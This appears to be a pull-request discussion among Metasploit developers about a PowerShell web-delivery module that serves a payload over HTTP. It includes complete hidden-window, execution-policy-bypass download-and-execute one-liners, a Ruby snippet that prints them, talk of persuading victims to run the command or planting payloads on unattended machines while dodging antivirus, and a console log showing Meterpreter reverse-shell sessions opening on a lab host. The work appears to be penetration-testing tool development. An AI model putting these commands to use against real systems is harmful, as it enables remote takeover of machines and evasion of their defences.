PSH Downloader

[Meatballs1]

Whacked together this module after being inspired by http://www.pentestgeek.com/2013/07/19/invoke-shellcode/

Generates a psh payload and serves it up via HTTP. Gives you the command line to run on local machine.

Handy if you don't have web access as per the blog, or working in a test environment etc. Also its somewhere I can goto when I forget the one liner...

[sempervictus]

@meatballs - isnt psh wonderful? Nice module, thanks.
@devs - could we please look at merging #2075? With all of this psh work coming in, the core libs in there for generating and working with PSH provide a nice set of framework components for generating uniform modules and libs. There's implicit obfu, clean post module execution for scripts and commands, etc. Powershell is the greatest thing since sliced telnet, lets exploit the daylights out of it.

[Meatballs1]

This is a bit naughty, but we cant access a randomly generated URIPATH as we haven't called super yet.

We cant print anything out after calling super as it goes off into a new thread.
There is only one event handler for HTTPServer? It would be nice to have an event handler for service start/service stop...?

[jvazquez-r7]

I agree, it doesn't look good. Why don't use the primer callback, which is called once the service has been started?

Using the primer callback the code would be something like:

    def primer
        download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
        print_good(download_and_run)
        print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
    end

Let me know if it has sense for you, please.

[jvazquez-r7]

On the other side, are the two print_good necessary :? looks like just the second print_good is needed to share the command line which the victim should run from powershell, right?

[jvazquez-r7]

Finally, the attack vector proposed is share this command line with a victim, and try to convince him to execute it from powershell, right?? just to be sure I'm not forgetting nothing.

[Meatballs1]

Yeah its not a super-duper attack! Its more the case that, you grab local access on a machine when they've stepped away and want to plant something quickly (and hopefully avoid AV/USB arbiters). Or gain RDP access to a machine but want the goodness of meterpreter but without the effort of mapping drives, copying across, downloading a script from http saving and opening etc :)

I'll look at the primer callback - I couldn't see that being called/didn't know it existed :)

[jakxx]

Would it be beneficial to merge my code that executes the command with this module? https://github.com/jakxx/metasploit-framework/blob/master/modules/exploits/windows/powershell/powershell_psexec.rb

That way, if you know the credentials a shell should follow soon after. Thoughts?

[jakxx]

However, if you are wanting to keep it as a stand alone thing, I could do a separate PR as well... Just wanting to get a feel for what would make the most sense.

[Meatballs1]

@jakxx You can use exploits/windows/smb/psexec_psh.rb for that? The purpose of this module isn't to deliver a remote exploit its to escalate to a more flexible payload if you already have local command execution.

[jakxx]

@Meatballs1 ahh gotcha. ok cool. Do you see any benefit to having another module that uses the IEX method as opposed to passing the command as one long parameter (current psexec_psh), or no?

[Meatballs1]

I think it is definitely useful, but perhaps as: cmdstager_http_psh mixin?

E.g. You write an exploit for command execution on a web page but limited length this technique would be great. That would be a good alternative to the cmdstager_vbs as its so short and doesn't drop a file.

[jakxx]

You might want to display the command to use the forced 32-bit version of powershell for 64-bit machines with something like this:

print_good("C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")

That way x86 payloads can be used even if the machine is x64

[jvazquez-r7]

Processing...

[jvazquez-r7]

Works with both methos (cmd and powershell):

msf exploit(psh_web_delivery) > rexploit
[*] Stopping existing job...

[*] Reloading module...
[*] Server stopped.
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/myHbBywMxOSB
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8080/myHbBywMxOSB'))"
msf exploit(psh_web_delivery) > [*] 192.168.172.196  psh_web_delivery - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.196:49438) at 2013-07-24 11:59:51 -0500

msf exploit(psh_web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(psh_web_delivery) > 
[*] 192.168.172.196  psh_web_delivery - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.196:49442) at 2013-07-24 12:00:17 -0500

msf exploit(psh_web_delivery) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(psh_web_delivery) >